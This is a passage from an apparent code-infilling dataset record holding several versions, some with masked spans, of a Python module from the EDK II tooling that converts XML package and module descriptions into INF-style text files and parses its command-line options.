MigrationError(OPTION_MISSING, name='-o', usage=Parser.\n get_usage())\n return Options, InputFile\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef SetCommon(Common, XmlCommon):\n XmlTag = 'Usage'\n Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = 'FeatureFlag'\n Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)\n XmlTag = 'SupArchList'\n Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'\n Common.HelpText = XmlElement(XmlCommon, XmlTag)\n\n\ndef SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):\n XmlParentTag = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParentTag + '/' + NameTag\n CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'GuidValue'\n CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'Version'\n CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)\n CommonHeader.FileName = os.path.basename(FileName)\n CommonHeader.FullPath = os.path.abspath(FileName)\n\n\n<mask token>\n\n\ndef AddToSpecificationDict(SpecificationDict, SpecificationString):\n \"\"\"Abstract specification name, value pair from Specification String\"\"\"\n for SpecificationMatch in mReSpecification.finditer(SpecificationString):\n Specification = SpecificationMatch.group('Specification')\n Value = SpecificationMatch.group('Value')\n SpecificationDict[Specification] = Value\n\n\ndef SetCommonHeader(CommonHeader, XmlCommonHeader):\n \"\"\"Set all attributes of CommonHeaderClass object from XmlCommonHeader\"\"\"\n XmlParent = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParent + '/' + 'Abstract'\n CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Description'\n CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Copyright'\n CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'License'\n CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Specification'\n Specification = 
XmlElement(XmlCommonHeader, XmlTag)\n AddToSpecificationDict(CommonHeader.Specification, Specification)\n XmlTag = XmlParent + '/' + 'ModuleType'\n CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)\n\n\ndef LoadClonedRecord(XmlCloned):\n ClonedRecord = ClonedRecordClass()\n XmlTag = 'Id'\n ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))\n XmlTag = 'FarGuid'\n ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageGuid'\n ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageVersion'\n ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleGuid'\n ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleVersion'\n ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)\n return ClonedRecord\n\n\ndef LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):\n GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()\n XmlTag = 'Name'\n GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)\n if XmlParent == 'Entry':\n XmlTag = '%s/C_Name' % XmlParent\n elif XmlParent == 'GuidCNames':\n XmlTag = '%s/GuidCName' % XmlParent\n else:\n XmlTag = '%s/%sCName' % (XmlParent, XmlParent)\n GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n XmlTag = XmlParent + '/' + 'GuidValue'\n GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n if XmlParent.endswith('Notify'):\n GuidProtocolPpiCommon.Notify = True\n XmlTag = 'GuidTypeList'\n GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.SupModuleList = SupModules.split()\n SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)\n return GuidProtocolPpiCommon\n\n\ndef LoadPcd(XmlPcd):\n \"\"\"Return a new PcdClass object 
equivalent to XmlPcd\"\"\"\n Pcd = PcdClass()\n XmlTag = 'PcdEntry/C_Name'\n Pcd.CName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/Token'\n Pcd.Token = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/TokenSpaceGuidCName'\n Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DatumType'\n Pcd.DatumType = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/MaxDatumSize'\n Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DefaultValue'\n Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdItemType'\n Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/ValidUsage'\n Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()\n XmlTag = 'SupModuleList'\n Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()\n SetCommon(Pcd, XmlPcd)\n return Pcd\n\n\ndef LoadLibraryClass(XmlLibraryClass):\n LibraryClass = LibraryClassClass()\n XmlTag = 'LibraryClass/Keyword'\n LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)\n if LibraryClass.LibraryClass == '':\n XmlTag = 'Name'\n LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)\n XmlTag = 'LibraryClass/IncludeHeader'\n LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)\n XmlTag = 'RecommendedInstanceVersion'\n RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion\n XmlTag = 'RecommendedInstanceGuid'\n RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.SupModuleList = SupModules.split()\n SetCommon(LibraryClass, XmlLibraryClass)\n return LibraryClass\n\n\ndef LoadBuildOption(XmlBuildOption):\n \"\"\"Return a new BuildOptionClass object equivalent to XmlBuildOption\"\"\"\n BuildOption = BuildOptionClass()\n BuildOption.Option = XmlElementData(XmlBuildOption)\n XmlTag = 
'BuildTargets'\n BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()\n XmlTag = 'ToolChainFamily'\n BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'TagName'\n BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'ToolCode'\n BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'SupArchList'\n BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()\n return BuildOption\n\n\ndef LoadUserExtensions(XmlUserExtensions):\n UserExtensions = UserExtensionsClass()\n XmlTag = 'UserID'\n UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)\n XmlTag = 'Identifier'\n UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)\n UserExtensions.Content = XmlElementData(XmlUserExtensions)\n return UserExtensions\n\n\ndef StoreTextFile(TextFile, Content):\n EdkLogger.verbose(Content)\n TextFile.write(Content)\n\n\ndef AddToSection(Section, Arch, Item):\n SectionArch = Section.get(Arch, [])\n if Item not in SectionArch:\n SectionArch.append(Item)\n Section[Arch] = SectionArch\n\n\n<mask token>\n\n\ndef StoreHeader(TextFile, CommonHeader):\n CopyRight = CommonHeader.Copyright\n Abstract = CommonHeader.Abstract\n Description = CommonHeader.Description\n License = CommonHeader.License\n Header = '#/** @file\\n#\\n'\n Header += '# ' + Abstract + '\\n#\\n'\n Header += '# ' + Description.strip().replace('\\n', '\\n# ') + '\\n'\n Header += '# ' + CopyRight + '\\n#\\n'\n Header += '# ' + License.replace('\\n', '\\n# ').replace(' ', ' ')\n Header += '\\n#\\n#**/\\n\\n'\n StoreTextFile(TextFile, Header)\n\n\ndef StoreDefinesSection(TextFile, DefinesTupleList):\n Section = '[Defines]\\n'\n for DefineItem in DefinesTupleList:\n Section += ' %-30s = %s\\n' % DefineItem\n Section += '\\n\\n'\n StoreTextFile(TextFile, Section)\n\n\ndef GetUserExtensions(UserExtensions):\n UserId = UserExtensions.UserID\n Identifier = UserExtensions.Identifier\n Content = 
UserExtensions.Content\n return '[UserExtensions.%s.%s]\\n %s\\n\\n' % (UserId, Identifier, Content)\n\n\n<mask token>\n\n\ndef GetTextFileInfo(FileName, TagTuple):\n ValueTuple = [''] * len(TagTuple)\n try:\n for Line in open(FileName):\n Line = Line.split('#', 1)[0]\n MatchEquation = mReEquation.match(Line)\n if MatchEquation:\n Tag = MatchEquation.group(1).upper()\n Value = MatchEquation.group(2)\n for Index in range(len(TagTuple)):\n if TagTuple[Index] == Tag:\n ValueTuple[Index] = Value\n except:\n EdkLogger.info('IO Error in reading file %s' % FileName)\n return ValueTuple\n\n\ndef GetXmlFileInfo(FileName, TagTuple):\n XmlDom = XmlParseFile(FileName)\n return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])\n\n\ndef MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):\n UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName\n Version = '%s Version %.2f' % (ToolName, VersionNumber)\n Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'\n Parser = OptionParser(description=Copyright, version=Version, usage=\n UsageString)\n Parser.add_option('-o', '--output', dest='OutputFile', help=\n 'The name of the %s file to be created.' 
% Destinate)\n Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',\n default=False, help=\n 'Automatically create the %s file using the name of the %s file and replacing file extension'\n % (Source, Destinate))\n Parser.add_option('-q', '--quiet', action='store_true', type=None, help\n ='Disable all messages except FATAL ERRORS.')\n Parser.add_option('-v', '--verbose', action='store_true', type=None,\n help='Turn on verbose output with informational messages printed.')\n Options, Args = Parser.parse_args()\n if Options.verbose:\n EdkLogger.setLevel(EdkLogger.VERBOSE)\n elif Options.quiet:\n EdkLogger.setLevel(EdkLogger.QUIET)\n else:\n EdkLogger.setLevel(EdkLogger.INFO)\n if len(Args) == 0:\n raise MigrationError(PARAMETER_MISSING, name='Input file', usage=\n Parser.get_usage())\n if len(Args) > 1:\n raise MigrationError(PARAMETER_INVALID, name='Too many input files',\n usage=Parser.get_usage())\n InputFile = Args[0]\n if not os.path.exists(InputFile):\n raise MigrationError(FILE_NOT_FOUND, name=InputFile)\n if Options.OutputFile:\n if Options.AutoWrite:\n raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',\n usage=Parser.get_usage())\n elif Options.AutoWrite:\n Options.OutputFile = os.path.splitext(InputFile)[0\n ] + '.' + Destinate.lower()\n else:\n raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.\n get_usage())\n return Options, InputFile\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef SetCommon(Common, XmlCommon):\n XmlTag = 'Usage'\n Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = 'FeatureFlag'\n Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)\n XmlTag = 'SupArchList'\n Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'\n Common.HelpText = XmlElement(XmlCommon, XmlTag)\n\n\ndef SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):\n XmlParentTag = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParentTag + '/' + NameTag\n CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'GuidValue'\n CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'Version'\n CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)\n CommonHeader.FileName = os.path.basename(FileName)\n CommonHeader.FullPath = os.path.abspath(FileName)\n\n\n<mask token>\n\n\ndef AddToSpecificationDict(SpecificationDict, SpecificationString):\n \"\"\"Abstract specification name, value pair from Specification String\"\"\"\n for SpecificationMatch in mReSpecification.finditer(SpecificationString):\n Specification = SpecificationMatch.group('Specification')\n Value = SpecificationMatch.group('Value')\n SpecificationDict[Specification] = Value\n\n\ndef SetCommonHeader(CommonHeader, XmlCommonHeader):\n \"\"\"Set all attributes of CommonHeaderClass object from XmlCommonHeader\"\"\"\n XmlParent = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParent + '/' + 'Abstract'\n CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Description'\n CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Copyright'\n CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'License'\n CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Specification'\n Specification = 
XmlElement(XmlCommonHeader, XmlTag)\n AddToSpecificationDict(CommonHeader.Specification, Specification)\n XmlTag = XmlParent + '/' + 'ModuleType'\n CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)\n\n\ndef LoadClonedRecord(XmlCloned):\n ClonedRecord = ClonedRecordClass()\n XmlTag = 'Id'\n ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))\n XmlTag = 'FarGuid'\n ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageGuid'\n ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageVersion'\n ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleGuid'\n ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleVersion'\n ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)\n return ClonedRecord\n\n\ndef LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):\n GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()\n XmlTag = 'Name'\n GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)\n if XmlParent == 'Entry':\n XmlTag = '%s/C_Name' % XmlParent\n elif XmlParent == 'GuidCNames':\n XmlTag = '%s/GuidCName' % XmlParent\n else:\n XmlTag = '%s/%sCName' % (XmlParent, XmlParent)\n GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n XmlTag = XmlParent + '/' + 'GuidValue'\n GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n if XmlParent.endswith('Notify'):\n GuidProtocolPpiCommon.Notify = True\n XmlTag = 'GuidTypeList'\n GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.SupModuleList = SupModules.split()\n SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)\n return GuidProtocolPpiCommon\n\n\ndef LoadPcd(XmlPcd):\n \"\"\"Return a new PcdClass object 
equivalent to XmlPcd\"\"\"\n Pcd = PcdClass()\n XmlTag = 'PcdEntry/C_Name'\n Pcd.CName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/Token'\n Pcd.Token = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/TokenSpaceGuidCName'\n Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DatumType'\n Pcd.DatumType = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/MaxDatumSize'\n Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DefaultValue'\n Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdItemType'\n Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/ValidUsage'\n Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()\n XmlTag = 'SupModuleList'\n Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()\n SetCommon(Pcd, XmlPcd)\n return Pcd\n\n\ndef LoadLibraryClass(XmlLibraryClass):\n LibraryClass = LibraryClassClass()\n XmlTag = 'LibraryClass/Keyword'\n LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)\n if LibraryClass.LibraryClass == '':\n XmlTag = 'Name'\n LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)\n XmlTag = 'LibraryClass/IncludeHeader'\n LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)\n XmlTag = 'RecommendedInstanceVersion'\n RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion\n XmlTag = 'RecommendedInstanceGuid'\n RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.SupModuleList = SupModules.split()\n SetCommon(LibraryClass, XmlLibraryClass)\n return LibraryClass\n\n\ndef LoadBuildOption(XmlBuildOption):\n \"\"\"Return a new BuildOptionClass object equivalent to XmlBuildOption\"\"\"\n BuildOption = BuildOptionClass()\n BuildOption.Option = XmlElementData(XmlBuildOption)\n XmlTag = 
'BuildTargets'\n BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()\n XmlTag = 'ToolChainFamily'\n BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'TagName'\n BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'ToolCode'\n BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'SupArchList'\n BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()\n return BuildOption\n\n\ndef LoadUserExtensions(XmlUserExtensions):\n UserExtensions = UserExtensionsClass()\n XmlTag = 'UserID'\n UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)\n XmlTag = 'Identifier'\n UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)\n UserExtensions.Content = XmlElementData(XmlUserExtensions)\n return UserExtensions\n\n\ndef StoreTextFile(TextFile, Content):\n EdkLogger.verbose(Content)\n TextFile.write(Content)\n\n\ndef AddToSection(Section, Arch, Item):\n SectionArch = Section.get(Arch, [])\n if Item not in SectionArch:\n SectionArch.append(Item)\n Section[Arch] = SectionArch\n\n\ndef GetSection(SectionName, Method, ObjectList):\n SupportedArches = ['common', 'Ia32', 'X64', 'Ipf', 'Ebc', 'ARM', 'AARCH64']\n SectionDict = {}\n for Object in ObjectList:\n Item = Method(Object)\n if Item == '':\n continue\n Item = ' %s' % Item\n Arches = Object.SupArchList\n if len(Arches) == 0:\n AddToSection(SectionDict, 'common', Item)\n else:\n for Arch in SupportedArches:\n if Arch.upper() in Arches:\n AddToSection(SectionDict, Arch, Item)\n Section = ''\n for Arch in SupportedArches:\n SectionArch = '\\n'.join(SectionDict.get(Arch, []))\n if SectionArch != '':\n Section += '[%s.%s]\\n%s\\n' % (SectionName, Arch, SectionArch)\n Section += '\\n'\n if Section != '':\n Section += '\\n'\n return Section\n\n\ndef StoreHeader(TextFile, CommonHeader):\n CopyRight = CommonHeader.Copyright\n Abstract = CommonHeader.Abstract\n Description = CommonHeader.Description\n License = 
CommonHeader.License\n Header = '#/** @file\\n#\\n'\n Header += '# ' + Abstract + '\\n#\\n'\n Header += '# ' + Description.strip().replace('\\n', '\\n# ') + '\\n'\n Header += '# ' + CopyRight + '\\n#\\n'\n Header += '# ' + License.replace('\\n', '\\n# ').replace(' ', ' ')\n Header += '\\n#\\n#**/\\n\\n'\n StoreTextFile(TextFile, Header)\n\n\ndef StoreDefinesSection(TextFile, DefinesTupleList):\n Section = '[Defines]\\n'\n for DefineItem in DefinesTupleList:\n Section += ' %-30s = %s\\n' % DefineItem\n Section += '\\n\\n'\n StoreTextFile(TextFile, Section)\n\n\ndef GetUserExtensions(UserExtensions):\n UserId = UserExtensions.UserID\n Identifier = UserExtensions.Identifier\n Content = UserExtensions.Content\n return '[UserExtensions.%s.%s]\\n %s\\n\\n' % (UserId, Identifier, Content)\n\n\n<mask token>\n\n\ndef GetTextFileInfo(FileName, TagTuple):\n ValueTuple = [''] * len(TagTuple)\n try:\n for Line in open(FileName):\n Line = Line.split('#', 1)[0]\n MatchEquation = mReEquation.match(Line)\n if MatchEquation:\n Tag = MatchEquation.group(1).upper()\n Value = MatchEquation.group(2)\n for Index in range(len(TagTuple)):\n if TagTuple[Index] == Tag:\n ValueTuple[Index] = Value\n except:\n EdkLogger.info('IO Error in reading file %s' % FileName)\n return ValueTuple\n\n\ndef GetXmlFileInfo(FileName, TagTuple):\n XmlDom = XmlParseFile(FileName)\n return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])\n\n\ndef MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):\n UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName\n Version = '%s Version %.2f' % (ToolName, VersionNumber)\n Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'\n Parser = OptionParser(description=Copyright, version=Version, usage=\n UsageString)\n Parser.add_option('-o', '--output', dest='OutputFile', help=\n 'The name of the %s file to be created.' 
% Destinate)\n Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',\n default=False, help=\n 'Automatically create the %s file using the name of the %s file and replacing file extension'\n % (Source, Destinate))\n Parser.add_option('-q', '--quiet', action='store_true', type=None, help\n ='Disable all messages except FATAL ERRORS.')\n Parser.add_option('-v', '--verbose', action='store_true', type=None,\n help='Turn on verbose output with informational messages printed.')\n Options, Args = Parser.parse_args()\n if Options.verbose:\n EdkLogger.setLevel(EdkLogger.VERBOSE)\n elif Options.quiet:\n EdkLogger.setLevel(EdkLogger.QUIET)\n else:\n EdkLogger.setLevel(EdkLogger.INFO)\n if len(Args) == 0:\n raise MigrationError(PARAMETER_MISSING, name='Input file', usage=\n Parser.get_usage())\n if len(Args) > 1:\n raise MigrationError(PARAMETER_INVALID, name='Too many input files',\n usage=Parser.get_usage())\n InputFile = Args[0]\n if not os.path.exists(InputFile):\n raise MigrationError(FILE_NOT_FOUND, name=InputFile)\n if Options.OutputFile:\n if Options.AutoWrite:\n raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',\n usage=Parser.get_usage())\n elif Options.AutoWrite:\n Options.OutputFile = os.path.splitext(InputFile)[0\n ] + '.' + Destinate.lower()\n else:\n raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.\n get_usage())\n return Options, InputFile\n\n\nif __name__ == '__main__':\n pass\n",
"step-4": "<mask token>\n\n\ndef SetCommon(Common, XmlCommon):\n XmlTag = 'Usage'\n Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = 'FeatureFlag'\n Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)\n XmlTag = 'SupArchList'\n Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'\n Common.HelpText = XmlElement(XmlCommon, XmlTag)\n\n\ndef SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):\n XmlParentTag = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParentTag + '/' + NameTag\n CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'GuidValue'\n CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'Version'\n CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)\n CommonHeader.FileName = os.path.basename(FileName)\n CommonHeader.FullPath = os.path.abspath(FileName)\n\n\nmReSpecification = re.compile('(?P<Specification>\\\\w+)\\\\s+(?P<Value>\\\\w*)')\n\n\ndef AddToSpecificationDict(SpecificationDict, SpecificationString):\n \"\"\"Abstract specification name, value pair from Specification String\"\"\"\n for SpecificationMatch in mReSpecification.finditer(SpecificationString):\n Specification = SpecificationMatch.group('Specification')\n Value = SpecificationMatch.group('Value')\n SpecificationDict[Specification] = Value\n\n\ndef SetCommonHeader(CommonHeader, XmlCommonHeader):\n \"\"\"Set all attributes of CommonHeaderClass object from XmlCommonHeader\"\"\"\n XmlParent = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParent + '/' + 'Abstract'\n CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Description'\n CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Copyright'\n CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'License'\n CommonHeader.License = XmlElement(XmlCommonHeader, 
XmlTag)\n XmlTag = XmlParent + '/' + 'Specification'\n Specification = XmlElement(XmlCommonHeader, XmlTag)\n AddToSpecificationDict(CommonHeader.Specification, Specification)\n XmlTag = XmlParent + '/' + 'ModuleType'\n CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)\n\n\ndef LoadClonedRecord(XmlCloned):\n ClonedRecord = ClonedRecordClass()\n XmlTag = 'Id'\n ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))\n XmlTag = 'FarGuid'\n ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageGuid'\n ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageVersion'\n ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleGuid'\n ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleVersion'\n ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)\n return ClonedRecord\n\n\ndef LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):\n GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()\n XmlTag = 'Name'\n GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)\n if XmlParent == 'Entry':\n XmlTag = '%s/C_Name' % XmlParent\n elif XmlParent == 'GuidCNames':\n XmlTag = '%s/GuidCName' % XmlParent\n else:\n XmlTag = '%s/%sCName' % (XmlParent, XmlParent)\n GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n XmlTag = XmlParent + '/' + 'GuidValue'\n GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n if XmlParent.endswith('Notify'):\n GuidProtocolPpiCommon.Notify = True\n XmlTag = 'GuidTypeList'\n GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.SupModuleList = SupModules.split()\n SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)\n return 
